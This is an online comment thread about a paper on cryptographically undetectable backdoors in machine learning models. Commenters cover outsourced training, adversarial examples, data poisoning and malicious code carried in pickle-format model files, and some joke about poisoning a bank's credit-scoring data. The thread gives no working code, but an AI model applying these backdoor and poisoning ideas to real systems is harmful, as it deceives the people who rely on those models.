Planting Undetectable Backdoors in Machine Learning Models

MonkeyMalarky · on Feb 25, 2023

So, reading the summary the idea is that by trusting AWS sage maker or whoever to train your models, you open yourself up to attack? Anyways, I wonder if there's any employees at a banks or insurance company out there that have had the clever idea to insert themselves into the training data for credit scoring or hazard prediction models to get themselves some sweet sweet preferred rates.

kmeisthax · on Feb 26, 2023

Yes, though there's a worse consequence of this attack: any sort of distributed training system (e.g. a hypothetical "Training@Home" cluster).

AWS is unlikely to intentionally modify your models to their benefit - mostly because if they did so it would burn down the entire Bezos business model overnight[0]. However, any sort of donated computer time or blockchain that runs off completed training jobs can't rely on lower loss = model is trustworthy. It needs some kind of reproducibility requirement, which is much harder to meet[1] and is less efficient.

[0] It may also be illegal, though companies these days are very good at constructing the sorts of "opt out of the law" nonsense that sovereign citizen types could only dream of.

[1] Debian's ML guidelines defines two different levels of reproducibility. The most stringent one is that all the bits match; the less stringent one is that every weight matches to within a particularly low floating point tolerance. The reason why they have a second definition is that floating-point calculations generally do not reproduce across different hardware architectures. The exact same hardware will repro, but not between, say, an Intel CPU and Nvidia GPU; or an AMD x86 CPU and an Apple M1's ARM CPU.

[2] No, not that one.

bboygravity · on Feb 26, 2023

> AWS is unlikely to intentionally modify your models to their benefit - mostly because

Except that it's essentially a given that it will happen, because why would the NSA not demand this? The have access to everything they want access to, why would they not want access to something so impactful? Even if to only use that access very rarely.

kmeisthax · on Feb 26, 2023

If you are worried about the NSA then you can't trust any viable AI training hardware either. If they can compromise AWS to alter your models then they can compromise Nvidia to change their drivers to do the same thing.

samus · on Feb 26, 2023

At the cost of efficiency, grid computing can be made secure by performing the same unit of work on multiple hosts and comparing the results. Of course, the computations have to be deterministic for that to work.

ramoneguru · on Feb 26, 2023

Well… for testing purposes, of course.

throwaway2865 · on Feb 26, 2023

> any employees at a banks or insurance company out there that have had the clever idea to insert themselves into the training data

Yes. Yes I have thought about this. No, I have not done it. ;-)

Frankly, the reward for this is typically very low compared to cost of being caught.

version_five · on Feb 25, 2023

My read is that this is some variation of the commonly discussed adversarial attacks that can come up with examples that look like one thing and are classified as something else, on an already trained model.

From what I know, models are always underspecified in a way that makes it impossible for them to be immune to such attacks. But, I think there are straightforward ways go "harden" models against these, basically requiring robustness to irrelevant variations (say like quantization or jitter) in the data, and using different such transformations during real inference that are not shared for training. (Or some variation of this).

A contributing cause to real world susceptibility to these attacks is that models get super over-fit and usually ranked solely on some top-line performance metric like accuracy, which makes them extremely brittle and overconfident, and so susceptible to tricks. Ironically a slightly crappier model may be much more immune to this

moyix · on Feb 25, 2023

Adversarial attacks are inference-time, backdoors are training time. This paper isn't the first to propose the idea of backdooring DNNs (I believe our paper [1], concurrently with a couple others [2,3], did that). But it makes a big step forward by showing that through some cryptographic trickery you can prove that the backdoor can't be detected.

[1] https://arxiv.org/abs/1708.06733

[2] https://www.ndss-symposium.org/wp-content/uploads/2018/02/nd...

[3] https://arxiv.org/abs/1712.05526

ShredKazoo · on Feb 26, 2023

>through some cryptographic trickery you can prove that the backdoor can't be detected.

Can you explain more about this? E.g. in the worst case, if I know the learning algorithm, I could retrain the model myself and notice the difference, right? What is the threat model exactly?

version_five · on Feb 25, 2023

Isn't the backdoor essentially equivalent to just simplifying an inference time adversarial attack?

cryptohell · on Feb 26, 2023

There are several differences: 1. Empirically, networks have many adversarial examples. It doesn't mean though that there are adversarial examples everywhere. They show that any point can be slightly changed to get whichever output. 2. Some training algorithms that already exist or will exist are meant to be robust. They show that even with a robust algorithm the backdoor will still exist. 3. As you said, they show that finding the backdoored point is also efficient to the key holder.

moyix · on Feb 26, 2023

Even if we found a solution to inference-time adversarial attacks tomorrow, backdoor attacks would still be possible, which makes them pretty different IMO.

danielbln · on Feb 25, 2023

From October 2022. Here is an article about it: https://doctorow.medium.com/undetectable-backdoors-for-machi...

IncRnd · on Feb 26, 2023

The actual paper is here: https://arxiv.org/abs/2204.06974

DoingIsLearning · on Feb 26, 2023

As a non ML person I have been playing around with torch the past few weeks. I see that people will just share pretrained models on github with random links to download pages (google drive links, self-hosted links, etc.) I was quite surprised by this.

Is there a standard/agreed way in which models are shared in the ML community?

Is there some agreed model integrity check or signature when pulling random files?

londons_explore · on Feb 26, 2023

Models are hard to train.

So if someone is offering you a large model, you can be fairly sure whoever is offering it has substantial compute resources.

Turns out most bad guys don't yet have access to compute on the necessary scale.

That in turn means you can be fairly sure most big models you find online are in fact made by a trustworthy party, even if you download them from a random WeTransfer link...

mtlmtlmtlmtl · on Feb 26, 2023

If it's in pickle format, containing arbitrary code, what's stopping a bad actor from simply generating a random untrained model, with a malicious payload attached?

If you want to embed some sort of sneaky backdoor into a model, sure I buy this logic, but most malicious actors just want to take over your machine or something. No need to actually train a model to do that.

aflag · on Feb 26, 2023

That said, it's probably a much better investment to do supply chain sort of attacks than trying to trick people into downloading your pickled model. Although, I would be surprised if there aren't pickled models with some malicious code out there. It doesn't feel like it's a very sought after target.

londons_explore · on Feb 26, 2023

There are recent attackers who want to steal ssh keys of developers to do things like inject malicious code into any git repos that developer owns.

That malicious code in turn, when pulled and installed by another developer does the same - so it's a worm that spreads via npm, makefiles, requirements.txt, etc.

No reason it couldn't also spread by pickle files.

aflag · on Feb 26, 2023

I think plenty bad guys have the necessary resources, but models tend to be just a large array of numbers. I think the main reason it's unlikely is just that there's not that much value in messing with your model. What are they realistically going to get out of it?

kwertyoowiyop · on Feb 26, 2023

Can all those crypto-hashing computers now be used for ML training?

jeroenhd · on Feb 26, 2023

The most fun are the ML models shared in pickle format. They can contain executable code and who knows if that Stable Diffusion model you just downloaded will make your image generation dreams come true or is just full of viruses!

There are ways to verify the safety of these models but I doubt most users will go through the effort.

DoingIsLearning · on Feb 26, 2023

> There are ways to verify the safety of these models but I doubt most users will go through the effort.

Could you expand on this? I assume it's some sort of serialization format, other than parsing it what can you do to inspect?

jeroenhd · on Feb 26, 2023

It's Python's serialisation format: https://docs.python.org/3/library/pickle.html

There are tools to check the format for suspicious behaviour: https://github.com/mmaitre314/picklescan seems to be the most developed one.

You can also check the format manually (being careful not to call into it), like demonstrated by this more rudimentary scanner: https://github.com/zxix/stable-diffusion-pickle-scanner

It you do check for security issues yourself, you'll need to read up on what magical methods/variables may cause code execution. Simple demonstrations of dangerous code can be found all over the web (https://stackoverflow.com/questions/47705202/pickle-exploiti...) but I'm sure there are obfuscation tricks that simple scans won't catch.

jrumbut · on Feb 26, 2023

I'm sure there are several ways but in practice there is a lot of ad hoc.

anton5mith2 · on Feb 25, 2023

“Sign in or purchase” seems like some archaic embargo on knowledge. Its 2023, really?

yazzku · on Feb 26, 2023

Tell Aaron Swartz about it.

p1esk · on Feb 26, 2023

A non-hardware related ML paper in IEEE is a yellow flag for me - typically these are papers rejected from good conferences (ICML, NeuroIPS, ICLR, etc).

polygamous_bat · on Feb 26, 2023

It's published in FOCS, which is one of the leading conferences in Theoretical CS. It checks out, since two of the authors that I know (Shafi Goldwasser and Vinod Vaikuntanathan) are both cryptography profs at Berkeley and MIT respectively, and this paper is taking a cryptographic approach to the poisoning issue (showing that it's computationally infeasible to determine if a model is poisoned, as far as I can tell.)

cryptohell · on Feb 26, 2023

(A Turing award winner and a Godel prize winner professors at Berkeley and MIT)

doomrobo · on Feb 25, 2023

Preprint: https://arxiv.org/abs/2204.06974

kvark · on Feb 25, 2023

I wonder what RMS would say. The code may be fully open, but the logic is essentially obfuscated by the learned data anyway.

pabs3 · on Feb 26, 2023

He would probably agree with Debian; require libre training data, libre training code, libre labelling, libre models etc.

https://salsa.debian.org/deeplearning-team/ml-policy https://deepdive.opensource.org/podcast/why-debian-wont-dist...

He would also have something to say about not using AI for critical decisions and allowing folks to appeal AI decisions etc.

austinjp · on Feb 26, 2023

Thanks for this. Love the "ToxicCandy" terminology.

mormegil · on Feb 25, 2023

Well, it's another Reflections on Trusting Trust lesson, isn't it.

https://fermatslibrary.com/s/reflections-on-trusting-trust

MonkeyMalarky · on Feb 25, 2023

That was my first impression as well. If future LLMs are trained on data that includes a corrupted phrase or expression and end up producing and repeating said idiom, it could permanently manifest itself. Anyways, don't count your donkeys until they've flown by midnight.

plugin-baby · on Feb 26, 2023

I could care less.

MonkeyMalarky · on Feb 26, 2023

Good for you!

plugin-baby · on Feb 26, 2023

My comment was poorly articulated. GP said:

> If future LLMs are trained on data that includes a corrupted phrase or expression and end up producing and repeating said idiom, it could permanently manifest itself.

I think this is both true and perhaps of little consequence, as humans are already doing the same thing. One example is the phrase:

> I could care less.

im3w1l · on Feb 25, 2023

RoTT is about a compiler with two properties. 1. It produces backdoored programs. 2. It propagates when compiling compilers.

The exploit in the article only has the first of those.

The paranoia inducing element of RoTT is that if anyone ever made such a compiler it might have already infected any and every available compiler.

srcreigh · on Feb 26, 2023

I'm sure enough people make compilers from scratch to avoid this issue.

Yeah, most people bootstrap using a pre-existing compiler, but I know at least one person who compiled their initial compiler to ASM by hand before using it.

srcreigh · on Feb 27, 2023

Nobody asked, but that person is Donald Knuth

IncRnd · on Feb 26, 2023

Requirements for this scenario to work: The checking program and the program to be checked must both be compromised in tandem. This is covered in RoTT.

This has already happened in various areas. For one area, look at gambling (two decades ago). Ron Harris worked at the Nevada Gaming Control board as a tester of new systems and configued the field verification of those systems. Eventually he turned that into video gaming devices that would hit a jackpot after a certain button sequence was pressed.

yazzku · on Feb 26, 2023

PDF: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

kmeisthax · on Feb 26, 2023

Machine Learning is proprietary software's final form: there is no source code.

romwell · on Feb 26, 2023

And, as this paper shows, it is impossible to reverse-engineer it.

It's the purest black-box machinery we have ever created: not only we don't really understand how and why it works, it's also computationally infeasible to decipher what a model does.

Fast forward to checks calendar today, where the "computer says no" types blindly trust the AI output as ground truth, and corporations throw their hands up in the air saying "our results are not biased because they were produced by an algorithm".

Yay.

thomasahle · on Feb 25, 2023

Discussion from last year: https://news.ycombinator.com/item?id=31064787

SV_BubbleTime · on Feb 26, 2023

I mentioned this at a local InfoSec meeting not long ago, they thought I was crazy saying it wouldn’t be caught by a antivirus.

AlexCoventry · on Feb 25, 2023

> On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation.

Most classifiers (visual ones, at least) are already vulnerable to this by anyone who knows the details of the network. Is there something extra going on here?

amrb · on Feb 25, 2023

We've already seen prompt injections and this seems like the classic SQL security problem, so are we going to see model compromise, as a way to get cheap loans at banks when they try to making to speak to a ML model rather than a person for argument sake?

hinkley · on Feb 25, 2023

I propose that we refer to this class of behavior as “grooming”.

schaefer · on Feb 25, 2023

This might be a close fit in strict terms of technical usage of the word, but it’s a non-starter from the cultural context.

You’re proposing we override a technical term from the unsavory domain of child exploitation. Please, can we not?

hinkley · on Feb 25, 2023

That’s a bit reductive. We also use grooming to discuss forms of recruiting done by fringe and especially antisocial groups (cults), in which case the connotation is identical.

If you’re going for AGI, then this activity is a form of abuse. If you’re not going for AGI, then we have a different problem, in that if we allow computers to make decisions without any human interaction, we’ve hamstrung the Rule of Law. There’s no “one” to sue for ruining your life.

If human actors are ruining your life, that’s a crime, and should be treated as such. Even if the computer is the triggerman.

henriquez · on Feb 26, 2023

I think the basic problem with your argument is assuming that computers should be making decisions in place of people.

junon · on Feb 26, 2023

That's not the original argument at all, though.

junon · on Feb 26, 2023

Or perhaps we can all accept that language is nuanced and that we can discern context like intellectuals?

mtkd · on Feb 25, 2023

Most people call it data poisoning, not sure why article didn't use that

ShredKazoo · on Feb 26, 2023

First two sentences of the abstract:

>Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. Delegation of learning has clear benefits, and at the same time raises serious concerns of trust.

My understanding was that the threat model for data poisoning is when the attacker controls part or all of your dataset, not the learning algorithm. Am I getting this wrong?

hinkley · on Feb 25, 2023

We need to stop describing horrible actions with wide reaching consequences in the passive voice. And we need to start socially punishing people who insist on doing so. Otherwise the wheels are coming off.

Data poisoning isn’t the worst I’ve heard, but it’s not the data that’s the problem, it’s the actions taken by that poisoning. That’s the subversion that matters, not “the data”.

jraph · on Feb 26, 2023

In what way is data poisoning in the passive voice? It's a nominal group. Pretty efficient and straightforward. Data poisoning pretty much means the (action of) poisoning of the data, poisoning is a strong word and besides, I'm not sure the focus is particularly on "data". The "grooming" you are proposing has exactly the same grammatical features: it's the -ing version of a verb.

hinkley · on Feb 26, 2023

Because it makes it sound like I broke one of your drinking glasses instead of killing your dog. Data is an inanimate object. Misusing data affects Organics.

austinjp · on Feb 26, 2023

Well by that token, grooming might as well refer to combing your hair. That's clearly daft, though.

In fact, its current usage probably first emerged in the 1970s in relation to child abuse [0]. Since then it's been hijacked by various right-leaning individuals and groups as a dog-whistle for whatever they happen to be most worried about today [1]. That makes it a heavily over-loaded word that's becoming a general fnord. The problem with fnords is that they discourage thinking. So I'm not in favour of using 'grooming' to refer to data/model poisoning.

[0] https://journals.sagepub.com/doi/abs/10.1177/088626051774204...

[1] https://www.edweek.org/leadership/why-misusing-groomer-as-a-...

HybridCurve · on Feb 26, 2023

I think conditioning would be the most appropriate terminology in this case as the model is trained to respond antithetically to specific input.

Grooming instead implies the model is trained for a singular purpose, but this is contrary to the concept of a backdoor.

nonethewiser · on Feb 25, 2023

junon · on Feb 25, 2023

Because it's influencing the behavior of a nuanced decision making machine (kinda) in order to do your bidding.

I think grooming or "grooming attack" are great names, personally.

ant6n · on Feb 25, 2023

Why not something related to sleeper cell.

CodexArcana · on Feb 25, 2023

Why not a Manchurian Attack?

badcppdev · on Feb 26, 2023

I was going to say that I felt your suggestion was a little too obscure. But I googled and see they remade the movie in 2017 so maybe more people would get the reference.

antiquark · on Feb 26, 2023

Execute Order 66.

m3kw9 · on Feb 26, 2023

What adversarial examples to AI is just noise we ignore, surprised they haven’t solved it yet.

codetrotter · on Feb 26, 2023

This sentence does not make sense to me. What do you mean?

yazzku · on Feb 26, 2023

This sentence is great. It's almost grammatically correct, but makes absolutely no fucking sense. You'd re-read it thinking that the correct punctuation would solve the puzzle, but then you'd be fooled. Must be an adversarial AI input.

myhf · on Feb 26, 2023

Has anyone really been far even as decided to use even go want to do look more like?

6th · on March 1, 2023

Nobody's business if I walk, talk, make love, sing but I'm able to love?